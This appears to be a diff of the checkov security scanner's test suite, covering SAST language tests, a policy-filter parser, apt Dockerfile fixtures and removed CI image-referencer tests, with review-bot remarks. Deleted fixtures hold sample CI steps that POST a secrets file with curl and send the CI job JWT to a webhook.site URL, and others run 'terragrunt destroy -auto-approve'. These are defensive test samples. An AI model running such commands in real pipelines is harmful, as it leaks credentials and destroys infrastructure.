@@ -824,8 +846,12 @@ def test_get_sast_languages(self): assert SastLanguages.PYTHON in sast_langs assert SastLanguages.JAVA in sast_langs assert SastLanguages.JAVASCRIPT in sast_langs - sast_langs = RunnerFilter.get_sast_languages(['sast_python'], []) + assert SastLanguages.TYPESCRIPT in sast_langs + assert SastLanguages.GOLANG in sast_langs + sast_langs = RunnerFilter.get_sast_languages(['sast_python', 'sast_typescript', 'sast_golang'], []) assert SastLanguages.PYTHON in sast_langs + assert SastLanguages.TYPESCRIPT in sast_langs + assert SastLanguages.GOLANG in sast_langs sast_langs = RunnerFilter.get_sast_languages(['sast_python', 'sast_javascript'], []) assert SastLanguages.PYTHON in sast_langs assert SastLanguages.JAVASCRIPT in sast_langs @@ -837,6 +863,8 @@ def test_get_sast_languages(self): assert SastLanguages.JAVA in sast_langs assert SastLanguages.PYTHON not in sast_langs assert SastLanguages.JAVASCRIPT not in sast_langs + assert SastLanguages.TYPESCRIPT in sast_langs + assert SastLanguages.GOLANG in sast_langs def test_scan_secrets_history_limits_to_secrets_framework(self): # when diff --git a/tests/common/utils/test_type_forcers.py b/tests/common/utils/test_type_forcers.py index 7373d5a728b..672bb656bec 100644 --- a/tests/common/utils/test_type_forcers.py +++ b/tests/common/utils/test_type_forcers.py 
@@ -1,16 +1,22 @@ import unittest -from checkov.common.util.type_forcers import convert_prisma_policy_filter_to_dict +from checkov.common.util.type_forcers import convert_prisma_policy_filter_to_params class TestTypeForcers(unittest.TestCase): def test_convert_prisma_policy_filter_to_dict(self): - self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1=A,F2=B'), {'F1': 'A', 'F2': 'B'}) - self.assertDictEqual(convert_prisma_policy_filter_to_dict(''), {}) - self.assertDictEqual(convert_prisma_policy_filter_to_dict(None), {}) - self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1 = A, F2= B '), {'F1': 'A', 'F2': 'B'}) - self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1=A,B,F2=C'), {'F1': 'A'}) - self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1=A,F2=B,C'), {'F1': 'A', 'F2': 'B'}) + self.assertListEqual(convert_prisma_policy_filter_to_params('F1=A,F2=B'), [('F1', 'A'), ('F2', 'B')]) + self.assertListEqual(convert_prisma_policy_filter_to_params(''), []) + self.assertListEqual(convert_prisma_policy_filter_to_params(None), []) + self.assertListEqual(convert_prisma_policy_filter_to_params('F1 = A, F2= B '), [('F1', 'A'), ('F2', 'B')]) + self.assertListEqual(convert_prisma_policy_filter_to_params('F1=A,B,F2=C'), [('F1', 'A'), ('F2', 'C')]) + self.assertListEqual(convert_prisma_policy_filter_to_params('F1=A,F2=B,C'), [('F1', 'A'), ('F2', 'B')]) + self.assertListEqual(convert_prisma_policy_filter_to_params('F1=A,F2=B,F1=C'), [('F1', 'A'), ('F2', 'B'), ('F1', 'C')]) + self.assertListEqual(convert_prisma_policy_filter_to_params('F1=A,F2=B,F1=C,F1=DDD'), [('F1', 'A'), ('F2', 'B'), ('F1', 'C'), ('F1', 'DDD')]) + + policy_string = 'policy.name=AWS S3 bucket ACL grants READ permission to everyone' + filter_string = convert_prisma_policy_filter_to_params(policy_string) + self.assertListEqual(filter_string, [('policy.name', 'AWS S3 bucket ACL grants READ permission to everyone')]) if __name__ == '__main__': 
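Review bot: The test still carries the old name `test_convert_prisma_policy_filter_to_dict` while every assertion now targets `convert_prisma_policy_filter_to_params` and a list of tuples; rename it to `test_convert_prisma_policy_filter_to_params` so the failure output names the function under test. The `'F1=A,B,F2=C'` expectation changed from `{'F1': 'A'}` to `[('F1', 'A'), ('F2', 'C')]`, i.e. a bare `B` token is now dropped and parsing continues; that is a behaviour change worth a one-line comment on the assertion, `# tokens without '=' are skipped, parsing continues`, so the next reader does not mistake it for a typo. In the last block `filter_string` holds a list, not a string; `filter_params` would match the function's new name.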
diff --git a/tests/dockerfile/checks/example_RunUsingAPT/failure2/Dockerfile b/tests/dockerfile/checks/example_RunUsingAPT/failure2/Dockerfile new file mode 100644 index 00000000000..8e4e8aa0fbb --- /dev/null +++ b/tests/dockerfile/checks/example_RunUsingAPT/failure2/Dockerfile @@ -0,0 +1,10 @@ +FROM ubuntu + +RUN apt install curl +RUN apt-get update && \ + apt-get install --yes --no-install-recommends \ + git && \ + apt-get clean autoclean && \ + apt-get autoremove --yes && \ + cd /var/lib && \ + rm -rf apt dpkg cache log \ No newline at end of file diff --git a/tests/dockerfile/checks/example_RunUsingAPT/failure3/Dockerfile b/tests/dockerfile/checks/example_RunUsingAPT/failure3/Dockerfile new file mode 100644 index 00000000000..08ec21f79ef --- /dev/null +++ b/tests/dockerfile/checks/example_RunUsingAPT/failure3/Dockerfile @@ -0,0 +1,9 @@ +FROM ubuntu + +RUN apt update && \ + apt-get install --yes --no-install-recommends \ + git && \ + apt-get clean autoclean && \ + apt-get autoremove --yes && \ + cd /var/lib && \ + rm -rf apt dpkg cache log \ No newline at end of file diff --git a/tests/dockerfile/checks/example_RunUsingAPT/success2/Dockerfile b/tests/dockerfile/checks/example_RunUsingAPT/success2/Dockerfile new file mode 100644 index 00000000000..e209fd3b277 --- /dev/null +++ b/tests/dockerfile/checks/example_RunUsingAPT/success2/Dockerfile @@ -0,0 +1,9 @@ +FROM ubuntu + +RUN apt-get update && \ + apt-get install --yes --no-install-recommends \ + git && \ + apt-get clean autoclean && \ + apt-get autoremove --yes && \ + cd /var/lib && \ + rm -rf apt dpkg cache log \ No newline at end of file diff --git a/tests/dockerfile/checks/example_RunUsingAPT/success3/Dockerfile b/tests/dockerfile/checks/example_RunUsingAPT/success3/Dockerfile new file mode 100644 index 00000000000..5c95faf3046 --- /dev/null +++ b/tests/dockerfile/checks/example_RunUsingAPT/success3/Dockerfile 
@@ -0,0 +1,5 @@
+FROM cypress/included:13.6.1
+RUN apt-get update -qq && apt-get install -y gnupg curl && \
+ echo "deb [signed-by=/usr/share/keyrings/cloud.google.gpg] https://packages.cloud.google.com/apt cloud-sdk main" | tee -a /etc/apt/sources.list.d/google-cloud-sdk.list && \
+ curl -sf https://packages.cloud.google.com/apt/doc/apt-key.gpg | apt-key --keyring /usr/share/keyrings/cloud.google.gpg add - && \
+ apt-get update && apt-get install -y google-cloud-sdk kubectl google-cloud-sdk-gke-gcloud-auth-plugin && apt-get clean
\ No newline at end of file
diff --git a/tests/dockerfile/checks/test_RunUsingAPT.py b/tests/dockerfile/checks/test_RunUsingAPT.py
index 71709dea40e..e29de7c6560 100644
--- a/tests/dockerfile/checks/test_RunUsingAPT.py
+++ b/tests/dockerfile/checks/test_RunUsingAPT.py
@@ -15,14 +15,22 @@ def test(self):
 report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
 summary = report.get_summary()
- passing_resources = {"/success/Dockerfile."}
- failing_resources = {"/failure/Dockerfile.RUN"}
+ passing_resources = {
+ "/success/Dockerfile.",
+ "/success2/Dockerfile.",
+ "/success3/Dockerfile.",
+ }
+ failing_resources = {
+ "/failure/Dockerfile.RUN",
+ "/failure2/Dockerfile.RUN",
+ "/failure3/Dockerfile.RUN",
+ }
 passed_check_resources = set([c.resource for c in report.passed_checks])
 failed_check_resources = set([c.resource for c in report.failed_checks])
- self.assertEqual(summary["passed"], 1)
- self.assertEqual(summary["failed"], 1)
+ self.assertEqual(summary["passed"], len(passing_resources))
+ self.assertEqual(summary["failed"], len(failing_resources))
 self.assertEqual(summary["skipped"], 0)
 self.assertEqual(summary["parsing_errors"], 0)
diff --git a/tests/github_actions/image_referencer/__init__.py b/tests/github_actions/image_referencer/__init__.py
deleted file mode 100644
index e69de29bb2d..00000000000
diff --git a/tests/github_actions/image_referencer/conftest.py b/tests/github_actions/image_referencer/conftest.py
deleted file mode 100644
index 1357f974587..00000000000
--- a/tests/github_actions/image_referencer/conftest.py
+++ /dev/null
@@ -1,522 +0,0 @@ -from __future__ import annotations -from typing import Any - -import pytest - - -@pytest.fixture -def workflow_with_images() -> dict[str, Any]: - return { - "name": "Name", - "on": { - "workflow_dispatch": { - "inputs": { - "logLevel": { - "description": "Log level", - "__startline__": 6, - "__endline__": 8 - }, - "__startline__": 5, - "__endline__": 8 - }, - "__startline__": 4, - "__endline__": 8 - }, - "__startline__": 3, - "__endline__": 8 - }, - "jobs": { - "destroy_cert": { - "runs-on": "ubuntu-latest", - "name": "Name", - "container": "node:14.16", - "steps": [ - { - "name": "Checkout codebase", - "uses": "actions/checkout@v3", - "__startline__": 14, - "__endline__": 16 - }, - { - "name": "infrastructure", - "working-directory": "terraform", - "shell": "bash", - "env": { - "TF_INPUT": 0, - "__startline__": 20, - "__endline__": 21 - }, - "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n", - "__startline__": 16, - "__endline__": 24 - } - ], - "__startline__": 10, - "__endline__": 24 - }, - "__startline__": 9, - "__endline__": 24 - }, - "__startline__": 1, - "__endline__": 24 - } - - -@pytest.fixture -def workflow_line_numbers_with_image() -> list[tuple[int, str]]: - return [(1, 'name: Name\n'), - (2, 'on:\n'), - (3, ' workflow_dispatch:\n'), - (4, ' inputs:\n'), - (5, ' logLevel:\n'), - (6, " description: 'Log level'\n"), - (7, '\n'), - (8, 'jobs:\n'), - (9, ' destroy_cert:\n'), - (10, ' runs-on: ubuntu-latest\n'), - (11, ' name: Name\n'), - (12, ' container: node:14.16\n'), - (13, ' steps:\n'), - (14, ' - name: Checkout codebase\n'), - (15, ' uses: actions/checkout@v3\n'), - (16, ' - name: infrastructure\n'), - (17, ' working-directory: terraform\n'), - (18, ' shell: bash\n'), - (19, ' env:\n'), - (20, ' TF_INPUT: 0\n'), - (21, ' run: |\n'), - (22, ' terragrunt init\n'), - (23, ' terragrunt destroy -auto-approve -var-file devl.tfvars\n')] - - -@pytest.fixture -def workflow_without_images() -> dict[str, Any]: - 
return { - "on": "pull_request", - "name": "unsecure-worfklow", - "jobs": { - "unsecure-job": { - "name": "job2", - "runs-on": "ubuntu-latest", - "env": { - "ACTIONS_ALLOW_UNSECURE_COMMANDS": True, - "__startline__": 10, - "__endline__": 11 - }, - "steps": [ - { - "name": "unsecure-step2", - "run": "echo \"goo\"\n", - "__startline__": 12, - "__endline__": 15 - } - ], - "__startline__": 7, - "__endline__": 15 - }, - "secure-job": { - "name": "job3", - "runs-on": "ubuntu-latest", - "env": { - "ACTIONS_ALLOW_UNSECURE_COMMANDS": False, - "__startline__": 19, - "__endline__": 20 - }, - "run": "echo \"ok\"", - "__startline__": 16, - "__endline__": 21 - }, - "__startline__": 6, - "__endline__": 21 - }, - "__startline__": 1, - "__endline__": 21 - } - - -@pytest.fixture -def workflow_line_numbers_with_image_first() -> list[tuple[int, str]]: - return [(1, 'name: Name\n'), - (2, 'on:\n'), - (3, ' workflow_dispatch:\n'), - (4, ' inputs:\n'), - (5, ' logLevel:\n'), - (6, " description: 'Log level'\n"), - (7, '\n'), - (8, 'jobs:\n'), - (9, ' first_job:\n'), - (10, ' container: node:14.22\n'), - (11, ' name: Name\n'), - (12, ' book: wood\n'), - (13, ' steps:\n'), - (14, ' - name: Checkout codebase\n'), - (15, ' uses: actions/checkout@v3\n'), - (16, ' - name: infrastructure\n'), - (17, ' working-directory: terraform\n'), - (18, ' shell: bash\n'), - (19, ' env:\n'), - (20, ' TF_INPUT: 0\n'), - (21, ' run: |\n'), - (22, ' terragrunt init\n'), - (23, ' terragrunt destroy -auto-approve -var-file devl.tfvars\n'), - (24, ' second_job:\n'), - (25, ' runs-on: ubuntu-latest\n'), - (26, ' name: Name\n'), - (27, ' container: node:14.16\n'), - (28, ' steps:\n'), - (29, ' - name: Checkout codebase\n'), - (30, ' uses: actions/checkout@v3\n'), - (31, ' - name: infrastructure\n'), - (32, ' working-directory: terraform\n'), - (33, ' shell: bash\n'), - (34, ' env:\n'), - (35, ' TF_INPUT: 0\n'), - (36, ' run: |\n'), - (37, ' terragrunt init\n'), - (38, ' terragrunt destroy -auto-approve -var-file 
devl.tfvars\n') - ] - - -@pytest.fixture -def workflow_line_numbers_with_two_identical_images() -> list[tuple[int, str]]: - return [(1, 'name: Name\n'), - (2, 'on:\n'), - (3, ' workflow_dispatch:\n'), - (4, ' inputs:\n'), - (5, ' logLevel:\n'), - (6, " description: 'Log level'\n"), - (7, '\n'), - (8, 'jobs:\n'), - (9, ' first_job:\n'), - (10, ' runs-on: ubuntu-latest\n'), - (11, ' name: Name\n'), - (12, ' container: node:14.16\n'), - (13, ' steps:\n'), - (14, ' - name: Checkout codebase\n'), - (15, ' uses: actions/checkout@v3\n'), - (16, ' - name: infrastructure\n'), - (17, ' working-directory: terraform\n'), - (18, ' shell: bash\n'), - (19, ' env:\n'), - (20, ' TF_INPUT: 0\n'), - (21, ' run: |\n'), - (22, ' terragrunt init\n'), - (23, ' terragrunt destroy -auto-approve -var-file devl.tfvars\n'), - (24, ' second_job:\n'), - (25, ' runs-on: ubuntu-latest\n'), - (26, ' name: Name\n'), - (27, ' container: node:14.16\n'), - (28, ' steps:\n'), - (29, ' - name: Checkout codebase\n'), - (30, ' uses: actions/checkout@v3\n'), - (31, ' - name: infrastructure\n'), - (32, ' working-directory: terraform\n'), - (33, ' shell: bash\n'), - (34, ' env:\n'), - (35, ' TF_INPUT: 0\n'), - (36, ' run: |\n'), - (37, ' terragrunt init\n'), - (38, ' terragrunt destroy -auto-approve -var-file devl.tfvars\n') - ] - - -@pytest.fixture -def workflow_with_image_first() -> dict[str, Any]: - return { - "name": "Name", - "on": { - "workflow_dispatch": { - "inputs": { - "logLevel": { - "description": "Log level", - "__startline__": 6, - "__endline__": 8 - }, - "__startline__": 5, - "__endline__": 8 - }, - "__startline__": 4, - "__endline__": 8 - }, - "__startline__": 3, - "__endline__": 8 - }, - "jobs": { - "first_job": { - "runs-on": "ubuntu-latest", - "name": "Name", - "container": "node:14.22", - "steps": [ - { - "name": "Checkout codebase", - "uses": "actions/checkout@v3", - "__startline__": 14, - "__endline__": 16 - }, - { - "name": "infrastructure", - "working-directory": "terraform", - 
"shell": "bash", - "env": { - "TF_INPUT": 0, - "__startline__": 20, - "__endline__": 21 - }, - "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n", - "__startline__": 16, - "__endline__": 24 - } - ], - "__startline__": 10, - "__endline__": 24 - }, - "second_job": { - "runs-on": "ubuntu-latest", - "name": "Name", - "container": "node:14.16", - "steps": [ - { - "name": "Checkout codebase", - "uses": "actions/checkout@v3", - "__startline__": 29, - "__endline__": 31 - }, - { - "name": "infrastructure", - "working-directory": "terraform", - "shell": "bash", - "env": { - "TF_INPUT": 0, - "__startline__": 35, - "__endline__": 36 - }, - "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n", - "__startline__": 31, - "__endline__": 39 - } - ], - "__startline__": 25, - "__endline__": 39 - }, - "__startline__": 24, - "__endline__": 39 - }, - "__startline__": 1, - "__endline__": 39 - } - - -@pytest.fixture -def workflow_with_two_identical_images() -> dict[str, Any]: - return { - "name": "Name", - "on": { - "workflow_dispatch": { - "inputs": { - "logLevel": { - "description": "Log level", - "__startline__": 6, - "__endline__": 8 - }, - "__startline__": 5, - "__endline__": 8 - }, - "__startline__": 4, - "__endline__": 8 - }, - "__startline__": 3, - "__endline__": 8 - }, - "jobs": { - "first_job": { - "runs-on": "ubuntu-latest", - "name": "Name", - "container": "node:14.16", - "steps": [ - { - "name": "Checkout codebase", - "uses": "actions/checkout@v3", - "__startline__": 14, - "__endline__": 16 - }, - { - "name": "infrastructure", - "working-directory": "terraform", - "shell": "bash", - "env": { - "TF_INPUT": 0, - "__startline__": 20, - "__endline__": 21 - }, - "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n", - "__startline__": 16, - "__endline__": 24 - } - ], - "__startline__": 10, - "__endline__": 24 - }, - "second_job": { - "runs-on": "ubuntu-latest", - "name": "Name", - 
"container": "node:14.16", - "steps": [ - { - "name": "Checkout codebase", - "uses": "actions/checkout@v3", - "__startline__": 29, - "__endline__": 31 - }, - { - "name": "infrastructure", - "working-directory": "terraform", - "shell": "bash", - "env": { - "TF_INPUT": 0, - "__startline__": 35, - "__endline__": 36 - }, - "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n", - "__startline__": 31, - "__endline__": 39 - } - ], - "__startline__": 25, - "__endline__": 39 - }, - "__startline__": 24, - "__endline__": 39 - }, - "__startline__": 1, - "__endline__": 39 - } - - -@pytest.fixture -def workflow_line_numbers_without_image() -> list[tuple[int, str]]: - return [(1, 'on: pull_request\n'), - (2, '\n'), - (3, 'name: unsecure-worfklow\n'), - (4, '\n'), - (5, 'jobs:\n'), - (6, ' unsecure-job:\n'), - (7, ' name: job2\n'), - (8, ' runs-on: ubuntu-latest\n'), - (9, ' env:\n'), - (10, ' ACTIONS_ALLOW_UNSECURE_COMMANDS: true\n'), - (11, ' steps:\n'), - (12, ' - name: unsecure-step2\n'), - (13, ' run: |\n'), - (14, ' echo "goo"\n'), - (15, ' secure-job:\n'), - (16, ' name: job3\n'), - (17, ' runs-on: ubuntu-latest\n'), - (18, ' env:\n'), - (19, ' ACTIONS_ALLOW_UNSECURE_COMMANDS: false\n'), - (20, ' run: |\n'), - (21, ' echo "ok"')] - - -@pytest.fixture -def image_cached_result() -> dict[str, Any]: - return { - "results": [ - { - "id": "sha256:f9b91f78b0344fa0efc5583d79e78a90556ab0bb3f93fcbc8728b0b70d29a5db", - "name": "python:3.9-alpine", - "distro": "Alpine Linux v3.16", - "distroRelease": "3.16.1", - "digest": "sha256:83a343afa488ff14d0c807b62770140d2ec30ef2e83a3a45c4ce62c29623e240", - "collections": ["All"], - "packages": [{"type": "os", "name": "zlib", "version": "1.2.12-r1", "licenses": ["Zlib"]}], - "compliances": [], - "complianceDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0}, - "complianceScanPassed": True, - "vulnerabilities": [ - { - "id": "CVE-2022-37434", - "status": "fixed in 1.2.12-r2", - "description": 
"zlib through 1.2.12 has a heap-based buffer over-read ...", - "severity": "low", - "packageName": "zlib", - "packageVersion": "1.2.12-r1", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", - "riskFactors": ["Has fix", "Recent vulnerability"], - "impactedVersions": ["<1.2.12-r2"], - "publishedDate": "2022-08-05T07:15:00Z", - "discoveredDate": "2022-08-08T13:45:43Z", - "fixDate": "2022-08-05T07:15:00Z", - } - ], - "vulnerabilityDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 1, "total": 1}, - "vulnerabilityScanPassed": True, - } - ] - } - - -@pytest.fixture -def definition() -> dict[str, Any]: - return { - "name": "CI", - "on": { - "push": { - "branches": [ - "main" - ], - "__startline__": 4, - "__endline__": 5 - }, - "__startline__": 3, - "__endline__": 5 - }, - "jobs": { - "container-test-job": { - "runs-on": "ubuntu-latest", - "container": { - "image": "node:14.16", - "env": { - "NODE_ENV": "development", - "__startline__": 11, - "__endline__": 12 - }, - "ports": [ - 80 - ], - "volumes": [ - "my_docker_volume:/volume_mount" - ], - "options": "--cpus 1", - "__startline__": 9, - "__endline__": 17 - }, - "steps": [ - { - "name": "Check for dockerenv file", - "run": "(ls /.dockerenv && echo Found dockerenv) || (echo No dockerenv)\ncurl -X POST -s --data \"@.secrets\" /dev/null\n", - "__startline__": 18, - "__endline__": 23 - } - ], - "__startline__": 7, - "__endline__": 23 - }, - "second_job": { - "runs-on": "ubuntu-latest", - "steps": [ - { - "name": "Check for dockerenv file", - "run": "(ls /.dockerenv && echo Found dockerenv) || (echo No dockerenv)\ncurl -X POST -s --data \"@.secrets\" /dev/null\n", - "__startline__": 26, - "__endline__": 30 - } - ], - "__startline__": 24, - "__endline__": 30 - }, - "__startline__": 6, - "__endline__": 30 - }, - "__startline__": 1, - "__endline__": 30 - } \ No newline at end of file 
diff --git a/tests/github_actions/image_referencer/test_github_action_provider.py b/tests/github_actions/image_referencer/test_github_action_provider.py
deleted file mode 100644
index 5c5f64f6aa6..00000000000
--- a/tests/github_actions/image_referencer/test_github_action_provider.py
+++ /dev/null
@@ -1,95 +0,0 @@ -import pytest - -from checkov.common.images.image_referencer import Image -from checkov.github_actions.image_referencer.provider import GithubActionProvider -from checkov.github_actions.runner import Runner - -def test_extract_images_from_workflow(workflow_with_images, workflow_line_numbers_with_image): - file_path = '/.github/workflows/workflow_with_string_container.yml' - - gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_with_images, - workflow_line_numbers=workflow_line_numbers_with_image) - images = gha_provider.extract_images_from_workflow() - - assert images == [ - Image( - end_line=13, - start_line=12, - name='node:14.16', - file_path=file_path, - related_resource_id='jobs(destroy_cert)' - ) - ] - - -def test_extract_images_from_workflow_no_images(workflow_without_images, workflow_line_numbers_without_image): - file_path = '/.github/workflows/unsecure_command.yaml' - - gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_without_images, - workflow_line_numbers=workflow_line_numbers_without_image) - images = gha_provider.extract_images_from_workflow() - - assert not images - - -def test_extract_images_from_workflow_with_first_image(workflow_with_image_first, workflow_line_numbers_with_image_first): - file_path = '/.github/workflows/command.yaml' - - gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_with_image_first, - workflow_line_numbers=workflow_line_numbers_with_image_first) - images = gha_provider.extract_images_from_workflow() - - assert len(images) == 2 - assert images[0].start_line != images[1].start_line - assert images[0].end_line != images[1].end_line - assert images[0].related_resource_id != images[1].related_resource_id - - -def test_extract_images_from_workflow_correct_line_numbers(workflow_with_two_identical_images, - workflow_line_numbers_with_two_identical_images): - file_path = '/.github/workflows/unsecure_command.yaml' - - 
gha_provider = GithubActionProvider(file_path=file_path, workflow_config=workflow_with_two_identical_images, - workflow_line_numbers=workflow_line_numbers_with_two_identical_images) - images = gha_provider.extract_images_from_workflow() - - assert len(images) == 2 - assert images[0].start_line != images[1].start_line - assert images[0].end_line != images[1].end_line - assert images[0].related_resource_id != images[1].related_resource_id - - -@pytest.mark.parametrize( - "start_line,end_line,expected_key", - [ - (9, 17, "jobs(container-test-job)"), - (24, 30, "jobs(second_job)"), - (35, 40, "") - ], -) -def test_generate_resource_key(start_line, end_line, expected_key, definition): - gha_provider = GithubActionProvider(definition, '', []) - - key = gha_provider.generate_resource_key(start_line, end_line) - - assert key == expected_key - - -@pytest.mark.parametrize( - "start_line, end_line, supported_entities, old_key_format, expected_key", - [ - (9, 17, ('jobs', 'jobs.*.steps[]'), 'jobs.container-test-job.CKV_GHA_3[7:23]', "jobs(container-test-job)"), - (24, 30, ('jobs', 'jobs.*.steps[]'), "jobs.second_job.CKV_GHA_3[24:30]", "jobs(second_job)") - ], -) -def test_generate_resource_key_generates_same_key_as_get_resource(start_line, end_line, supported_entities, - old_key_format, expected_key, definition): - gha_provider = GithubActionProvider(definition, '', []) - runner = Runner() - file_path = "mock_path" - runner.definitions[file_path] = definition - - key1 = runner.get_resource(file_path, old_key_format, supported_entities, start_line, end_line) - key2 = gha_provider.generate_resource_key(start_line, end_line) - - assert key1 == key2 == expected_key diff --git a/tests/github_actions/image_referencer/test_manager.py b/tests/github_actions/image_referencer/test_manager.py deleted file mode 100644 index 5c8a8350864..00000000000 --- a/tests/github_actions/image_referencer/test_manager.py +++ /dev/null 
@@ -1,30 +0,0 @@ -from checkov.common.images.image_referencer import Image -from checkov.github_actions.image_referencer.manager import GithubActionsImageReferencerManager - - -def test_extract_images_from_workflow(workflow_with_images, workflow_line_numbers_with_image): - file_path = '/.github/workflows/workflow_with_string_container.yml' - - manager = GithubActionsImageReferencerManager(file_path=file_path, workflow_config=workflow_with_images, - workflow_line_numbers=workflow_line_numbers_with_image) - images = manager.extract_images_from_workflow() - - assert images == [ - Image( - end_line=13, - start_line=12, - name='node:14.16', - file_path=file_path, - related_resource_id='jobs(destroy_cert)' - ) - ] - - -def test_extract_images_from_workflow_no_images(workflow_without_images, workflow_line_numbers_without_image): - file_path = '/.github/workflows/unsecure_command.yaml' - - manager = GithubActionsImageReferencerManager(file_path=file_path, workflow_config=workflow_without_images, - workflow_line_numbers=workflow_line_numbers_without_image) - images = manager.extract_images_from_workflow() - - assert not images diff --git a/tests/github_actions/image_referencer/test_runner.py b/tests/github_actions/image_referencer/test_runner.py deleted file mode 100644 index d14473b37a0..00000000000 --- a/tests/github_actions/image_referencer/test_runner.py +++ /dev/null 
@@ -1,65 +0,0 @@ -from pathlib import Path - -from checkov.common.output.report import CheckType - -from checkov.common.bridgecrew.bc_source import get_source_type -from checkov.github_actions.runner import Runner - -from checkov.runner_filter import RunnerFilter -from pytest_mock import MockerFixture - -from tests.common.image_referencer.test_utils import mock_get_license_statuses_async, mock_get_image_cached_result_async - -RESOURCES_PATH = Path(__file__).parent.parent / "resources/.github/workflows" - - -def test_github_action_workflow(mocker: MockerFixture): - from checkov.common.bridgecrew.platform_integration import bc_integration - - file_name = "workflow_with_string_container.yml" - image_name = "node:14.16" - image_id = "sha256:2460522297" - code_lines = "12-13" - image_resource_postfixes = ["go", "openssl", "musl"] - test_file = RESOURCES_PATH / file_name - - runner_filter = RunnerFilter(run_image_referencer=True) - bc_integration.bc_source = get_source_type("disabled") - - mocker.patch( - "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async", - side_effect=mock_get_image_cached_result_async, - ) - mocker.patch( - "checkov.common.images.image_referencer.get_license_statuses_async", - side_effect=mock_get_license_statuses_async, - ) - # 'workflow_with_string_container.yml (node:14.16 lines:12-13 (sha256:f9b91f78b0)).musl' - reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter) - - assert len(reports) == 2 - - gha_report = next(report for report in reports if report.check_type == CheckType.GITHUB_ACTIONS) - sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) - - assert len(gha_report.resources) == 0 - assert len(gha_report.passed_checks) == 14 - assert len(gha_report.failed_checks) == 2 - assert len(gha_report.skipped_checks) == 0 - assert len(gha_report.parsing_errors) == 0 - - assert len(sca_image_report.resources) == 3 - assert 
sca_image_report.resources == {
- f".github/workflows/{file_name} ({image_name} lines:{code_lines} ({image_id})).{postfix}"
- for postfix in image_resource_postfixes
- }
- assert sca_image_report.image_cached_results[0]["dockerImageName"] == "node:14.16"
- assert sca_image_report.image_cached_results[0]["packages"] == [
- {"type": "os", "name": "tzdata", "version": "2021a-1+deb11u5", "licenses": []}
- ]
-
- assert len(sca_image_report.passed_checks) == 1
- assert len(sca_image_report.failed_checks) == 4
- assert len(sca_image_report.image_cached_results) == 1
- assert len(sca_image_report.skipped_checks) == 0
- assert len(sca_image_report.parsing_errors) == 0
diff --git a/tests/github_actions/test_runner.py b/tests/github_actions/test_runner.py
index fe16fe7c5cf..963a5a8ffe8 100644
--- a/tests/github_actions/test_runner.py
+++ b/tests/github_actions/test_runner.py
@@ -229,9 +229,9 @@ def test_runner_on_build(self):
 assert report.failed_checks[0].triggers[0] == {'workflow_dispatch', 'push'}
 assert report.failed_checks[0].workflow_name == 'build'
- assert report.passed_checks[6].job[0] == "publish-checkov-dockerhub"
- assert report.passed_checks[6].triggers[0] == {'workflow_dispatch', 'push'}
- assert report.passed_checks[6].workflow_name == 'build'
+ assert report.passed_checks[8].job[0] == "publish-checkov-dockerhub"
+ assert report.passed_checks[8].triggers[0] == {'workflow_dispatch', 'push'}
+ assert report.passed_checks[8].workflow_name == 'build'
 def test_runner_on_codeql_analysis(self):
 # given
diff --git a/tests/gitlab_ci/image_referencer/__init__.py b/tests/gitlab_ci/image_referencer/__init__.py
deleted file mode 100644
index e69de29bb2d..00000000000
diff --git a/tests/gitlab_ci/image_referencer/resources/single_image/.gitlab-ci.yml b/tests/gitlab_ci/image_referencer/resources/single_image/.gitlab-ci.yml
deleted file mode 100644
index bb827be51cb..00000000000
--- a/tests/gitlab_ci/image_referencer/resources/single_image/.gitlab-ci.yml
+++ /dev/null
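Review bot: `report.passed_checks[8]` in the tests/github_actions/test_runner.py hunk is a positional assertion that this very commit had to bump from index 6, and it will break again the next time a check is added or reordered for the build workflow. Select the record by the job it describes instead, so the test states what it verifies: `publish = next(c for c in report.passed_checks if c.job and c.job[0] == "publish-checkov-dockerhub")`, then assert `publish.triggers[0] == {'workflow_dispatch', 'push'}` and `publish.workflow_name == 'build'` on that record. If several passed checks share that job, narrow the selection further by the check's id so the pick stays unique; the enclosing test_runner_on_build starts outside the hunk.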
@@ -1,7 +0,0 @@ -default: - image: - name: redis:latest - entrypoint: ["/bin/bash"] - -deploy: - script: 'curl -H \"Content-Type: application/json\" -X POST --data "$CI_JOB_JWT_V1" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826' \ No newline at end of file diff --git a/tests/gitlab_ci/image_referencer/resources/single_image/image_without_name.gitlab-ci.yml b/tests/gitlab_ci/image_referencer/resources/single_image/image_without_name.gitlab-ci.yml deleted file mode 100644 index 28796e6c1fe..00000000000 --- a/tests/gitlab_ci/image_referencer/resources/single_image/image_without_name.gitlab-ci.yml +++ /dev/null @@ -1,8 +0,0 @@ -unit tests: - image: - entrypoint: - - "/opt/bin/entry_point_unit_tests.sh" - - services: - - name: "postgres:13.2" - alias: postgres \ No newline at end of file diff --git a/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py b/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py deleted file mode 100644 index 5857aabca69..00000000000 --- a/tests/gitlab_ci/image_referencer/test_gitlab_ci_provider.py +++ /dev/null 
